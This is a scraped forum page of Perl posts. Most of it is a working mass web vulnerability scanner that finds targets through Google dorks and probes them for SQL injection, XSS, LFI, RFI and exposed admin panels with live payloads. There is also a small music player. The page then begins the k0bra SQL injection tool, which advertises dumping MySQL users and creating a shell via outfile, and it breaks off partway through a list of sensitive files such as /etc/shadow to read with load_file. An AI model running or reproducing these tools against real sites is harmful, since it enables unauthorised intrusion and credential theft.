,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');

# Shared HTTP client for every request the script makes: fixed User-Agent string
# and a 5 second timeout. The string has no space between "Gecko/20080201" and
# "Firefox", which makes it a distinctive value to search for in access logs.
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

# Create the logs/ directory if needed, then start the interactive menu.
installer();

sta();

# sta()
# Entry point of the interactive scanner: shows the menu, runs the chosen scans
# and then calls finish(). The named subs head, menu and scan are written
# inside sta, but named subs are package-level in Perl, so the nesting is only
# visual.
# NOTE(review): finish() calls sta() again and menu() calls itself on invalid
# input, so the call stack grows with every round.
sub sta {
# head(): clears the console ("cls") and prints the ASCII banner.
sub head {
system 'cls';
print qq(


@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
@  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
@  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
@@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
@    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
@    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




);
}
&menu;
# menu(): asks for the URL source (a word list file or a Google query) and the
# scan types, then hands both to scan().
sub menu {
&head;
print "[a] : Scan a File\n";
print "[b] : Search in google and scan the webs\n\n";
print "[option] : ";
chomp(my $op = <STDIN>);
# The choice is an unanchored, case-insensitive match: any input containing "a".
if ($op =~/a/ig) {
print "\n[+] Wordlist : ";
chomp(my $word = <STDIN>);
# Each URL is cut after its first "=" by cortar() and duplicates are dropped.
my @paginas = repes(cortar(savewords($word)));
my $option = &men;
print "\n\n[+] Opening File\n";
scan($option,@paginas);
}
elsif ($op=~/b/ig) {
print "\n[+] Dork : ";
chomp(my $dork = <STDIN>);
print "[+] Pages : ";
chomp(my $pag = <STDIN>);
my $option = &men;
print "\n\n[+] Searching in google\n";
my @paginas = &google($dork,$pag);
scan($option,@paginas);
}
else {
&menu;
}
}
# scan(option, urls...): runs every check whose letter occurs in $option
# against each URL. Letters are matched as unanchored, case-insensitive
# substrings, so several checks can be combined in one answer.
sub scan {
my ($option,@webs) = @_;
print "\n\n[Status] : Scanning\n";
print "[Webs Count] : ".int(@webs)."\n\n";
for(@webs) {
if ($option=~/S/ig) {
scansql($_);
}
if ($option=~/K/ig) {
sql($_);
}
if ($option=~/Q/ig) {
sqladmin($_);
}
if ($option=~/Y/ig) {
simple($_);
}
if ($option=~/L/ig) {
lfi($_);
}
if ($option=~/R/ig) {
rfi($_);
}
if ($option=~/F/ig) {
fsd($_);
}
if ($option=~/X/ig) {
scanxss($_);
}
if ($option=~/M/ig) {
mssql($_);
}
if ($option=~/J/ig) {
access($_);
}
if ($option=~/O/ig) {
oracle($_);
}
if ($option=~/HT/ig) {
http($_);
}
if ($option=~/A/ig) {
scansql($_);
scanxss($_);
mssql($_);
access($_);
oracle($_);
lfi($_);
rfi($_);
fsd($_);
http($_);
}
}
}
print "\n\n[Status] : Finish\n";
&finish;
}

# toma(url)
# GETs $url with the shared user agent $nave and returns the response body.
# The body is returned whatever the HTTP status was.
sub toma {
    my ($url) = @_;
    my $response = $nave->get($url);
    return $response->content;
}

# tomaz(url)
# GETs $url with the shared user agent $nave and returns the response object,
# so callers can inspect the status (for example ->is_success).
sub tomaz {
    my ($url) = @_;
    my $response = $nave->get($url);
    return $response;
}

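# savefile(name, line)
# Appends $line plus a newline to logs/$name. Returns the result of close() on
# success and a false value when the file cannot be opened.
# Uses three-argument open with a lexical handle instead of the two-argument
# form and the shared bareword handle SAVE.
sub savefile {
    my ( $name, $line ) = @_;

    # Logging is best-effort: an unwritable log must not abort a scan.
    open my $fh, '>>', 'logs/' . $name or return;
    print {$fh} $line . "\n";
    return close $fh;
}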

# finish()
# Prints the copyright line, waits for one line on STDIN and restarts the menu
# through sta().
sub finish {
    my $notice = "\n\n\n(C) Doddy Hackman 2010\n\n";
    print $notice;

    # Pause until the user presses Enter; the line itself is discarded.
    my $discarded = <STDIN>;

    sta();
}

# google(query, max_start)
# Fetches Google result pages for $a with start=10,20,...,$b, keeps links to
# webcache.googleusercontent.com, extracts the URL from the
# "cache:<id>:<url>+" part, cuts each URL after its first "=" with cortar()
# and returns the de-duplicated list.
# NOTE(review): $a and $b shadow the variables sort() uses; @url, @founds,
# $pages and $code are package globals, so results accumulate across calls.
# The query is concatenated into the URL without URL-encoding.
sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

# The right-hand @founds is still the package array filled above.
my @founds = repes(cortar(@founds));
return @founds;
}

# sql(page)
# Appends "-1+union+select+666--" to $page and reports the URL (and appends it
# to logs/sql-logs.txt) when the response contains MySQL's "The used SELECT
# statements have a different number of columns" error.
# Defender view: the check depends on the database error text reaching the
# client. Parameterised queries remove the flaw, and generic error pages remove
# the signal. "union+select+666" in a query string is a usable log signature.
# $code1 is a package global.
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);
}}

# sqladmin(page)
# Runs the same "-1+union+select+666--" check as sql(). When the MySQL column
# count error comes back, it also requests every @panels path below
# "http://<host>/" and logs each one whose response is_success to
# logs/admin-logs.txt.
# Defender view: the first request is recognisable by "union+select+666"; the
# follow-up is a burst of requests for login/admin paths from the same client.
# $code1 and $code are package globals.
sub sqladmin {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "\n[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);

my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);

# The scheme is always rebuilt as http://, whatever the original URL used.
my $fage = "http://".$auth;

# Reuses the lexical $path declared above as the loop variable.
for $path(@panels) {
$code = tomaz($fage."/".$path);
if ($code->is_success) {
print "[+] Link : ".$fage."/".$path."\n";
savefile("admin-logs.txt",$fage."/".$path);
}}}}

# http(url)
# Connects to port 80 of the URL's host, sends "OPTIONS  / HTTP/1.0", reads up
# to 1000 bytes and appends the Server and Allow header values to
# logs/http-logs.txt.
# Defender view: what is collected is the server banner and the list of allowed
# methods. A minimal banner and only the methods the site needs leave little to
# collect.
# NOTE(review): the socket is used without checking that the connection
# succeeded; $resultado is a package global.
sub http {

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);

my $socket = IO::Socket::INET->new(
PeerAddr=>$auth,
PeerPort=>"80",
Proto=>"tcp");

print $socket "OPTIONS  / HTTP/1.0\r\n\r\n";
read $socket,$resultado,"1000";

# (.*) stops at the end of the header line.
if ($resultado=~/Server:(.*)/g) {
my $server = $1;

savefile("http-logs.txt","[+] Page : $auth"."\n");
savefile("http-logs.txt","[+] Server : ".$server."\n");
}
if ($resultado=~/Allow: (.*)/g) {
my $options = $1;
savefile("http-logs.txt","[+] Options : ".$options."\n");
}
$socket->close;
}

# scanxss(page)
# Reflection test for the forms found on $page: every non-submit field is
# filled with one of two <script>alert(String.fromCharCode(...))</script>
# strings (plain, and prefixed with '">'), the form is submitted by POST or
# GET, and the response is searched for the unmodified string.
# Defender view: a hit means user input is echoed without output encoding.
# Context-aware encoding at the point of output is the fix. The fixed
# fromCharCode(101,115,116,111,...) sequence (it spells "estoydenuevoenesto")
# is a usable signature in request logs.
# NOTE(review): $orden is used as a package scalar although "my @orden" is
# declared, so it keeps growing across forms and calls. POST findings are only
# reported when the stored value is numeric (a form index).
sub scanxss {

my $page = shift;
chomp $page;

my @testar = HTML::Form->parse(toma($page),"/");
my @botones_names;
my @botones_values;
my @orden;
my @pa = ("<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",'"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>');
my @get_founds;
my @post_founds;
my @ordenuno;
my @ordendos;

my $contador_forms = 0;

my $valor = "doddyhackman";

for my $test(@testar) {
$contador_forms++;
if ($test->method eq "POST") {
my @inputs = $test->inputs;
for my $in(@inputs) {
# Submit buttons are collected separately; all other fields receive the test strings.
if ($in->type eq "submit") {
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
push(@ordenuno,$in->name,$pa[0]);
push(@ordendos,$in->name,$pa[1]);
}}

# One POST per submit button and per test string.
for my $n(0..int(@botones_names)-1) {
my @preuno = @ordenuno;
my @predos = @ordendos;
push(@preuno,$botones_names[$n],$botones_values[$n]);
push(@predos,$botones_names[$n],$botones_values[$n]);

my $codeuno = $nave->post($page,\@preuno)->content;
my $codedos = $nave->post($page,\@predos)->content;
if ($codeuno=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig or
$codedos=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig) {
# Unnamed forms are recorded by their index on the page.
if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
push(@post_founds,$contador_forms);
} else {
push(@post_founds,$test->attr(name));
}}}
} else { #End of the POST method branch
my @inputs = $test->inputs;
for my $in(@inputs) {
if ($in->type eq "submit") {
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
# GET forms: build "name=doddyhackman&..." and substitute the placeholder later.
$orden.=''.$in->name.'='.$valor.'&';
}}
chop($orden);
for my $n(0..int(@botones_names)-1) {
my $partedos = "&".$botones_names[$n]."=".$botones_values[$n];
my $final = $orden.$partedos;
for my $strin(@pa) {
chomp $strin;
# Only the first placeholder occurrence is replaced (no /g).
$final=~s/doddyhackman/$strin/;
$code = toma($page."?".$final);
my $strin = "\Q$strin\E";
if ($code=~/$strin/) {
push(@get_founds,$page."?".$final);
}}}}}

my @get_founds = repes(@get_founds);
if (int(@get_founds) ne 0) {
for(@get_founds) {
savefile("xss-logs.txt","[+] XSS Found : $_");
print "[+] XSS Found : $_\n\a";
}}

my @post_founds = repes(@post_founds);
if (int(@post_founds) ne 0) {
for my $t(@post_founds) {
if ($t =~/^\d+$/) {
savefile("xss-logs.txt","[+] XSS : Form $t in $page");
print "[+] XSS : Form $t in $page\n\a";
}}}}


# simple(url)
# Collects the links on $_[0], takes the directory part of each link's path and
# requests "http://<host><dir>". A response containing "Index of ...<" is
# reported and appended to logs/dir-logs.txt.
# Defender view: the finding is an enabled directory listing. Turning
# auto-indexing off on the web server removes it.
# NOTE(review): "$_[0] =~ s/.../" edits the caller's variable through the @_
# alias. $repetidos is a package global, so directories seen in earlier calls
# are skipped. $path1 and $parche are used as unescaped regex patterns.
sub simple {

my $code  = toma($_[0]);
my @links = get_links($code);

for my $com (@links) {
my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
if ( $path =~ /\/(.*)$/ ) {
my $path1 = $1;
$_[0] =~ s/$path1//ig;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
# Everything up to the last "/" of the link's path is the directory to test.
if ( $path =~ /(.*)\// ) {
my $parche = $1;                                 
unless($repetidos=~/$parche/){
$repetidos.=" ".$parche;
my $code=toma("http://".$auth.$parche);     
if ($code =~ /Index of (.*)</ig ) {
my $dir_found = $1;
chomp $dir_found;
print "[+] Directory Found : "."http://".$auth.$parche."\n";
savefile("dir-logs.txt","[+] Directory Found : "."http://".$auth.$parche);
}}}}}}

# scansql(page)
# Error-based SQL injection check. First appends a single quote to $page and
# looks for MySQL/PHP error strings in the response. If none is found and the
# URL has a query string, it loads the page without the query string, fills
# every non-submit field of each POST form with a single quote, submits it and
# looks for the same error strings.
# Defender view: every signal used here is an error message leaking to the
# client. Parameterised queries remove the flaw; disabling error display in
# production removes the signal and the path/line disclosure that comes with it.
# NOTE(review): $co is a package global; POST findings are only reported when
# the stored value is numeric (a form index).
sub scansql {

my $page = shift;
my $copia = $page;

$co = toma($page."'");

if ($co=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $co=~ /mysql_free_result/ig || $co =~ /mysql_fetch_assoc/ig ||$co =~ /mysql_num_rows/ig || $co =~ /mysql_fetch_array/ig || $co =~/mysql_fetch_assoc/ig || $co=~/mysql_query/ig || $co=~/mysql_free_result/ig || $co=~/equivocado en su sintax/ig || $co=~/You have an error in your SQL syntax/ig || $co=~/Call to undefined function/ig) {
savefile("sql-logs.txt","[+] SQL : $page");
print "[+] SQLI : $page\a\n";
} else {

# No error on the GET test: continue with the forms of the page itself.
if ($page=~/(.*)\?(.*)/) {
my $page = $1;

my @testar = HTML::Form->parse(toma($page),"/");
my @botones_names;
my @botones_values;
my @orden;
my @get_founds;
my @post_founds;
my @ordenuno;
my @ordendos;

my $contador_forms = 0;

my $valor = "doddyhackman";

for my $test(@testar) {
$contador_forms++;
if ($test->method eq "POST") {
my @inputs = $test->inputs;
for my $in(@inputs) {
if ($in->type eq "submit") {
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
push(@ordenuno,$in->name,"'");
}}

# One POST per submit button collected so far.
for my $n(0..int(@botones_names)-1) {
my @preuno = @ordenuno;
push(@preuno,$botones_names[$n],$botones_values[$n]);
my $code = $nave->post($page,\@preuno)->content;
if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
# Unnamed forms are recorded by their index on the page.
if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
push(@post_founds,$contador_forms);
} else {
push(@post_founds,$test->attr(name));
}}}}

my @post_founds = repes(@post_founds);
if (int(@post_founds) ne 0) {
for my $t(@post_founds) {
if ($t =~/^\d+$/) {
savefile("sql-logs.txt","[+] SQLI : Form $t in $page");
print "[+] SQLI : Form $t in $page\n\a";
}}}}}}}

# access(page)
# Appends a single quote to $page and reports the URL (log: jetdb-logs.txt)
# when the response contains a Microsoft JET / Access ODBC driver error.
# Defender view: the signal is the driver error text reaching the client.
# Parameterised queries and generic error pages remove it.
# $code1 is a package global.
sub access {

my $page = shift;
$code1 = toma($page."'");
if ($code1=~/Microsoft JET Database/ig or $code1=~/ODBC Microsoft Access Driver/ig) {
print "[+] Jet DB : $page\a\n";
savefile("jetdb-logs.txt",$page);
}
}

# mssql(page)
# Appends a single quote to $page and reports the URL (log: mssql-logs.txt)
# when the response contains "ODBC SQL Server Driver".
# Defender view: the signal is the driver error text reaching the client.
# Parameterised queries and generic error pages remove it.
# $code1 is a package global.
sub mssql {

my $page = shift;
$code1 = toma($page."'");
if ($code1=~/ODBC SQL Server Driver/ig) {
print "[+] MSSQL : $page\a\n";
savefile("mssql-logs.txt",$page);
}
}

# oracle(page)
# Appends a single quote to $page and reports the URL (log: oracle-logs.txt)
# when the response contains "Microsoft OLE DB Provider for Oracle".
# Defender view: the signal is the provider error text reaching the client.
# Parameterised queries and generic error pages remove it.
# $code1 is a package global.
sub oracle {

my $page = shift;
$code1 = toma($page."'");
if ($code1=~/Microsoft OLE DB Provider for Oracle/ig) {
print "[+] Oracle : $page\a\n";
savefile("oracle-logs.txt",$page);
}
}

# rfi(page)
# Appends an external URL to $page and reports the URL (log: rfi-logs.txt) when
# text from that external site appears in the response, i.e. when the
# application fetched and included the remote address it was given.
# Defender view: include targets must come from a fixed allow-list, never from
# request parameters; in PHP, allow_url_include should stay off.
# $code1 is a package global.
sub rfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #This is real knowledge xDDD
print "[+] RFI : $page\a\n";
savefile("rfi-logs.txt",$page);
}}

# lfi(page)
# Appends a single quote to $page and reports the URL (log: lfi-logs.txt) when
# the response contains PHP's "No such file or directory in <b>...</b> on line"
# warning, which shows that the parameter reached a file-opening call.
# Defender view: map request values to file names through an allow-list and
# keep PHP warnings out of responses.
# $code1 is a package global.
sub lfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print "[+] LFI : $page\a\n";
savefile("lfi-logs.txt",$page);
}}

# fsd(page)
# Appends the URL's own path (without the leading slash) to $page and reports
# the URL (log: fpd-logs.txt) when the response contains PHP source of the form
# header(... Content-Disposition: attachment; i.e. when a download script
# returned its own source code.
# Defender view: download handlers must resolve the requested name against an
# allow-list or a fixed directory and never serve application source files.
# $code1 is a package global.
sub fsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure : $page\a\n";
savefile("fpd-logs.txt",$page);
}}}

# repes(list)
# Returns the items of the argument list that have not been seen before, in
# their original order.
# The "seen" table %repe is a package global, so an item returned by one call
# is filtered out of every later call as well.
sub repes {
    my @limpio = grep { !$repe{$_}++ } @_;
    return @limpio;
}

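# savewords(file)
# Returns the lines of $file, each with its line ending left in place.
# Returns an empty list when the file cannot be opened.
# Security: the file name comes from an interactive prompt and was passed to
# two-argument open(), which interprets characters such as "|", ">" and "<" in
# the name as a mode or a command to run. Three-argument open with an explicit
# read mode treats the value as a file name only.
# The lines are collected in a lexical array; the old package arrays @words and
# @r were never reset, so a second call also returned the first call's lines.
sub savewords {
    my ($file) = @_;

    open my $fh, '<', $file or return;
    my @words = <$fh>;
    close $fh;

    return @words;
}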

# men()
# Prints the scan-type menu, reads one line from STDIN and returns it without
# the trailing newline. scan() matches the letters of the answer.
sub men {
    my @menu_lines = (
        "\n\n[+] Scan Type : \n\n",
        "[X] : XSS\n",
        "[S] : SQL GET/POST\n",
        "[K] : SQL GET\n",
        "[Q] : SQL GET + Admin\n",
        "[Y] : Directory listing\n",
        "[M] : MSSQL\n",
        "[J] : Jet Database\n",
        "[O] : Oracle\n",
        "[L] : LFI\n",
        "[R] : RFI\n",
        "[F] : Full Source Discloure\n",
        "[HT] : HTTP Information\n",
        "[A] : All\n\n",
        "\n[Options] : ",
    );

    # One print per entry, in the same order as before.
    for my $line (@menu_lines) {
        print $line;
    }

    chomp( my $option = <STDIN> );
    return $option;
}

# cortar(list)
# Cuts every item that contains "=" after its first "=" (so "page.php?id=5"
# becomes "page.php?id=") and returns the items otherwise unchanged.
# The split result is also left in the package array @tengo, as before.
sub cortar {
    my @nuevo;
    for my $item (@_) {
        unless ( $item =~ /=/ ) {
            push @nuevo, $item;
            next;
        }
        @tengo = split /=/, $item;
        push @nuevo, $tengo[0] . "=";
    }
    return @nuevo;
}

# get_links(html)
# Parses $_[0] with HTML::LinkExtor and returns the link attribute values that
# the callback agarrar() collected.
# NOTE(review): @links and $test are package globals and @links is never
# emptied here, so each call also returns the links found by earlier calls.
# agarrar is written inside get_links, but named subs are package-level in
# Perl, so it is an ordinary sibling sub.
sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

# Callback: receives the tag name and its link attributes; keeps the values only.
sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}


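# installer()
# Creates the logs/ directory in the current working directory if it does not
# exist yet.
# The mode used to be the string "777", which Perl reads as decimal 777 (octal
# 1411), not as octal 0777. On systems that honour modes this produced a
# directory its owner could not write to. The directory holds scan results, so
# it is now created for the owner only (0700, further reduced by the umask).
sub installer {
    return if -d "logs/";
    mkdir "logs/", 0700;
    return;
}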

# ¿ The End ?
#336
Scripting / [Perl] Musikeiro 0.1
3 Diciembre 2011, 16:32 PM
Un reproductor de música que hice hace dos años, en el verano.


#!usr/bin/perl
#Musikeiro 0.1
#Simple music player
#Written by Doddy H in the summer of 2009
#ppm install http://www.bribes.org/perl/ppm/Win32-Console-ANSI.ppd
#ppm install http://www.bribes.org/perl/ppm/Win32-MediaPlayer.ppd

use Win32::Console::ANSI;
use Win32::MediaPlayer;

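# Greet the user and ask for the media URL. The \e[...m sequences are ANSI
# colour codes (Win32::Console::ANSI is loaded above to render them).
print "\n\e[;32m Bienvenido a Musikeiro\e[0m\n\n\n";

print "\e[33;45;1m Inserta la URL a reproducir: \e[0m";
chomp(my $play = <STDIN>);
print "\n\e[42m Playing $play \e[0m\n";
print "\n\e[31mPresiona Control + c para detener cancion\e[0m\n\n";

# Direct method call instead of the indirect-object form "new Class".
my $nave = Win32::MediaPlayer->new;
$nave->load($play);
$nave->play;

# Keep the process alive until Ctrl+C (presumably play() returns immediately,
# since the original also looped here). Sleeping avoids pinning a CPU core the
# way the empty "while(1) { }" did.
while (1) {
    sleep 1;
}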

# The End ?
#337
Scripting / [Perl] K0bra 1.5
1 Diciembre 2011, 22:14 PM
La nueva versión de mi scanner SQLi

Las funciones son las siguientes

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostrar tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados


    #!usr/bin/perl
    #k0bra 1.5
    #Console version
    #Automatic SQL Scanner for MYSQL
    #(c)0ded By Doddy H

    system('cls');
    system ("title k0bra");

    my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_lo
g','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini',
